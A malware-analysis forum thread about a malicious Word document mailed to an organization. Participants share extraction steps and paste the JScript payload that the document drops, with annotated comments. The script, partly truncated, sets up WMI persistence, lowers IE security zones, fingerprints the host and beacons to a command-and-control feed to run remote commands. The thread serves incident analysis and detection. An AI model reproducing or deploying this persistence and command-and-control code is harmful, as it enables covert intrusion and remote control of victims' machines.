
Buffer overflow attack in Microsoft Word targeted at a sensitive organization


The malicious doc was mailed to the organization. I am analyzing it; it does not contain any malicious VB script, but officemalwarescanner does show it as creating
Api-Name GetTempPath
Api-Name CreateFile
Api-Name CloseHandle
Api-name WriteFile

I am trying to find the shellcode, if there is any.

i have posted the doc file at h__p://www.offensivecomputing.net/?q=ocsearch&ocq=aada36da206a13ed56979c1a6838a1e6.

HI

Analyze the file in Hex Workshop. You'll find GetTempPath
Api-Name CreateFile
Api-Name CloseHandle
Api-name WriteFile

Also XOR the file with key C7 using Hex Workshop, then analyze it again.

Rgds

Hi

thanks !

sample

Is the link you gave above actually the Aurora malware sample?

Found the script below:

// Installer stage of the sample as posted. The configuration values are blank
// in this copy, so the dropped exe/script names, the feed URL and the owner
// tag cannot be recovered from the page.
var scriptfilename="";
var exefilename="";
var sXmlUrl="";
var sOwner="";
var ofso=new ActiveXObject("Scripting.FileSystemObject");
// Retries once a second until the dropped executable has been deleted
// (presumably waiting for the process that still holds it to exit).
while(ofso.FileExists(exefilename)){
ofso.DeleteFile(exefilename);
WScript.Sleep(1000);
}
// root\subscription is the WMI namespace that stores permanent event
// subscriptions; the registration stage of this script uses it for persistence.
var oWMI=GetObject("winmgmts:\\\\.\\root\\subscription");
var InstallName="";
// The interval value was lost in the page extraction; it is used as the
// timer's IntervalBetweenEvents in the registration stage.
var InstallRunTimer=;
// Payload stage: a JScript program kept in a string and installed later as the
// ScriptText of a WMI ActiveScriptEventConsumer, so it runs inside the WMI
// script host (scrcons.exe) each time the timer fires. The page extraction
// broke the string across lines and truncated three loop headers
// ("for(var i=0;i..." where a "<" was stripped), so the tail of Decode, the
// head of MainLoop and the command-dispatch loop are missing from this copy.
// The constructor copies the feed URL and owner tag from the installer's
// variables; "$=this" publishes the instance as a global that every prototype
// method refers to as $ rather than this.
var codestr="var MAIN=function(){$=this;$.key='W';$.sFeedUrl='"+sXmlUrl+"';
$.sOwner='"+sOwner+"';
$.sXmlUrl=$.sFeedUrl;
$.oHttp=null;
$.oShell=null;
$.oStream=null;
$.oIE=null;
$.sHostName=null;
$.sOSType=null;
$.sMacAddress=null;
$.sURLParam=null;
$.version='0.5.2';
$.oWMI=null;
$._x=ActiveXObject;
// Registry paths touched by SetLowZone/SetBlankSearch: three values under IE
// security zone 3 (presumably the Internet zone) and the IE Search Page.
// NOTE(review): 1201/1400 look like the "ActiveX not marked safe" and
// "Active scripting" zone actions — confirm against the IE zone action table.
$.sZone='HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3';
$.sReg1=$.sZone+'\\1201';
$.sReg2=$.sZone+'\\1400';
$.sReg3=$.sZone+'\\CurrentLevel';
$.iVal1=$.iVal2=$.iVal3=0;
$.sRegSearchPage='HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\Search Page';
$.rd='REG_DWORD';
$.rs='REG_SZ';$.ab='about:blank';};
MAIN.prototype={
// Creates the WMI, WScript.Shell and ADODB.Stream objects, opens the hidden IE
// instance and collects the host fingerprint used in the beacon.
InitObjects: function(){
$.oWMI=GetObject('winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2');
$.oShell=new $._x('WScript.Shell');
$.oStream=new $._x('ADODB.Stream');
$.InitIE();$.GetOSInfo();
$.GetMacAddress();
$.GenerateUrlParam();
},
// Runs a WQL query against root\cimv2 and returns the result set.
WMI:function(sql){
return $.oWMI.ExecQuery(sql);
},
// Fingerprint: OS caption + service pack major version, and the computer name.
GetOSInfo: function(){
var e=new Enumerator($.WMI('Select * from Win32_OperatingSystem'));
if(!e.atEnd()){
var item=e.item();
$.sOSType=item.Caption+item.ServicePackMajorVersion;$.sHostName=item.CSName;
}
},
// Fingerprint: MAC address of the first connected (NetConnectionStatus=2)
// PCI network adapter.
GetMacAddress: function(){
var e=new Enumerator($.WMI("Select * from Win32_NetworkAdapter where PNPDeviceID like '%PCI%' and NetConnectionStatus=2"));
if(!e.atEnd()){
$.sMacAddress=e.item().MACAddress;
}
},
// Builds the form-encoded beacon body: hard-coded credentials, host name, OS,
// MAC, owner tag, version, plus a minutes+seconds value as a cache-buster.
// The static authname/authpass pair is a usable network signature.
GenerateUrlParam:function(){
var time=new Date();
$.sURLParam='cstype=server&authname=servername&authpass=serverpass&hostname='+$.sHostName+'&ostype='+$.sOSType+'&macaddr='+$.sMacAddress+'&owner='+$.sOwner+'&version='+$.version;$.sURLParam+='&t='+time.getMinutes()+time.getSeconds();
},
// Starts an invisible InternetExplorer.Application, blanks the search page and
// lowers the zone settings before any request is made through it.
InitIE: function(){
$.oIE=new $._x('InternetExplorer.Application');
$.oIE.visible=0;
$.SetBlankSearch();
$.SetLowZone();
},
// Quits IE and puts the search page and zone values back as they were found,
// so the registry changes are only visible while the payload is running.
CloseIE: function(){
$.oHttp=null;
$.oIE.quit();
$.oIE=null;
$.SetDefaultSearch();
$.SetDefaultZone();
},
// Tear-down: closes IE, drops the COM objects and terminates every running
// scrcons.exe (the WMI script consumer host this payload itself runs under).
CleanObjects: function(){
$.CloseIE();
$.oShell=null;
$.oStream=null;
var e=new Enumerator($.WMI("Select * from Win32_Process where Name='scrcons.exe'"));
while(!e.atEnd()){e.item().terminate();e.moveNext();}
},
// Decodes a comma-separated list of numbers keyed by the first character of
// the input; the loop body is lost in the truncated line below, so the exact
// transform (presumably per-value subtraction/XOR with keycode) is unknown.
Decode:function(sourceStr){
var keycode=sourceStr.charCodeAt(0);
var source=sourceStr.substr(1);
var vals=source.split(',');
var result='';
// Truncated line: the rest of Decode, the MainLoop header and the start of its
// body are missing. The surviving fragment injects a CreateWinHttp helper into
// the IE document's script context so the HTTP request is issued from IE.
for(var i=0;ifunction CreateWinHttp(){return new ActiveXObject('WinHttp.WinHttpRequest.5.1')}");
$.oHttp=$.oIE.Document.Script.CreateWinHttp();
// C2 discovery: GET the feed URL with a spoofed Firefox User-Agent, parse it
// as RSS, and pick a random //channel/item/title entry as the command URL.
// Any failure is swallowed and sXmlUrl stays equal to sFeedUrl.
try{
$.oHttp.Open('GET',$.sFeedUrl,false);
$.oHttp.setRequestHeader('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.9.1) Gecko/20090624 Firefox/3.5');
$.oHttp.Send();
var response=$.oHttp.ResponseText.replace(/(^\\s*)|(\\s*$)/g,'');
var oXml=new ActiveXObject('MSXML2.DOMDocument.3.0');
oXml.loadXML(response);
var items=oXml.selectNodes('//channel/item/title');
var fd=new Array();
// Truncated line: the loop that filters titles into fd is missing.
for(var i=0,fc=0;i0){
$.sXmlUrl=fd[parseInt(Math.random()*fd.length)];
}
}catch(e){}
// Check-in: POST the fingerprint; a non-empty reply is parsed as XML and its
// <div> elements are treated as commands.
$.oHttp.Open('POST',$.sXmlUrl,false);
$.oHttp.setRequestHeader('CONTENT-TYPE','application/x-www-form-urlencoded');
$.oHttp.Send($.sURLParam);
var response=$.oHttp.ResponseText.replace(/(^\\s*)|(\\s*$)/g, '');
if(response.length>0){
var commands=null;
var oXml = new ActiveXObject('MSXML2.DOMDocument.3.0');
oXml.loadXML(response);
var container = oXml.getElementsByTagName('div');
// Truncated line: the command-dispatch loop is missing; only the tail that
// accumulates per-command results (keyed by the div's id) survives.
for(var i=0;i0){commandresult+=',';}
commandresult+='\"'+commands[i].id+'\":\"'+escape(result)+'\"';
}
// Results are returned to the same URL as a JSON-like string in the
// commandresult parameter.
if(commandresult.length>0){
commandresult='{'+commandresult+'}';
$.oHttp.Open('POST',$.sXmlUrl,false);
$.oHttp.setRequestHeader('CONTENT-TYPE','application/x-www-form-urlencoded');
$.oHttp.Send($.sURLParam+'&command=result&commandresult='+commandresult);
}
}
}
},
// Saves the current IE Search Page value and replaces it with about:blank.
SetBlankSearch:function(){
$.sDefaultPage=$.oShell.regread($.sRegSearchPage);
$.RW('$.sRegSearchPage','$.ab','$.rs');
},
SetDefaultSearch:function(){
$.RW('$.sRegSearchPage','$.sDefaultPage','$.rs');
},
// Saves the three zone-3 values and sets each of them to 0; restored by
// SetDefaultZone. These writes are a usable registry-monitoring indicator.
SetLowZone:function(){
$.dVal1=$.oShell.regread($.sReg1);
$.dVal2=$.oShell.regread($.sReg2);
$.dVal3=$.oShell.regread($.sReg3);
$.RW('$.sReg1','0','$.rd');
$.RW('$.sReg2','0','$.rd');
$.RW('$.sReg3','0','$.rd');
},
SetDefaultZone:function(){
$.RW('$.sReg1','$.dVal1','$.rd');
$.RW('$.sReg2','$.dVal2','$.rd');
$.RW('$.sReg3','$.dVal3','$.rd');
},
// Registry write helper: the arguments are source-text fragments, so the
// regwrite call is assembled as a string and run through eval rather than
// called directly.
RW:function(p1,p2,p3){
var cms='$.oShell.';
cms+='regwrite('+p1+','+p2+','+p3+');';
eval(cms);
},
// Entry point per timer tick: init, one MainLoop pass (errors swallowed),
// then clean-up.
Fire: function(){
$.InitObjects();
try{
$.MainLoop();
}catch(e){}
$.CleanObjects();
}
};

// Last statement of the consumer script: instantiate and run the payload.
new MAIN().Fire();
// Persistence stage: registers a permanent WMI event subscription in
// root\subscription. The payload string becomes the ScriptText of an
// ActiveScriptEventConsumer, a __IntervalTimerInstruction raises __TimerEvent
// on the InstallRunTimer interval, an __EventFilter selects those events by
// TimerID, and a __FilterToConsumerBinding ties filter to consumer. Permanent
// subscriptions are stored in the WMI repository, so no file or Run key is
// needed; instances of these four classes in root\subscription are what to
// enumerate when hunting for this sample.
var Asec=oWMI.Get("ActiveScriptEventConsumer").Spawninstance_();
Asec.Name=InstallName+"_consumer";
Asec.ScriptingEngine="jscript";
Asec.ScriptText=codestr;
var Asecpath=Asec.put_();
var WMITimer=oWMI.Get("__IntervalTimerInstruction").Spawninstance_();
WMITimer.TimerID=InstallName+"_WMITimer";
// NOTE(review): IntervalBetweenEvents is in milliseconds per the WMI
// documentation — confirm; the value itself is missing in this copy.
WMITimer.IntervalBetweenEvents=InstallRunTimer;
WMITimer.SkipIfPassed=false;
WMITimer.put_();
var EventFilter=oWMI.Get("__EventFilter").Spawninstance_();
EventFilter.Name=InstallName+"_filter";
EventFilter.Query="select * from __timerevent where timerid=\""+InstallName+"_WMITimer\"";
EventFilter.QueryLanguage="wql";
var FilterPath=EventFilter.put_();
var Binds=oWMI.Get("__FilterToConsumerBinding").Spawninstance_();
Binds.Consumer=Asecpath.path;Binds.Filter=FilterPath.path;Binds.put_();
// The installer deletes its own script file once the subscription is in place.
if(ofso.FileExists(scriptfilename)){
ofso.DeleteFile(scriptfilename);
}

Seems like an IE exploit.

there's an exe file in

There's an exe file in there. No doc files.

Mostly there exe's embedded

Mostly there are EXEs embedded in DOC exploit files, XOR-encoded. But it is interesting to see a script in a DOC exploit. Do you have other Office exploit samples as well?

Hi

This is the only one I have along the DOC lines.

Another Interesting thing!!!!!!!!

There is also a DOC file embedded in this exploit file. It starts at offset 0x8BA0.

To extract it, open the file in Hex Workshop,
press Ctrl+G,
select the radio buttons "hex" and "beginning of file", enter the offset 8BA0 and click Go.
In hex you will see the values CF D0 E0 11.
From here select everything till the end of the file.
Copy it, press Ctrl+N and paste it there.
Now change the values CF D0 E0 11 to D0 CF 11 E0
and save it as a DOC file.

You'll get the genuine DOC file embedded in the exploit sample.

You may already know this, but since it is not on the list

hi,

I will put a small description of what is not on the list; you may already know it.

1. The malicious document drops ieupdate.exe in the temp folder
C:\documents and settings\user name\local settings\temp\

2. This ieupdate.exe is the known IE exploit that contains the script.

ieupdate.exe starts the process `cscript.exe ieupdate.js` — this starts iexplore.exe.

hp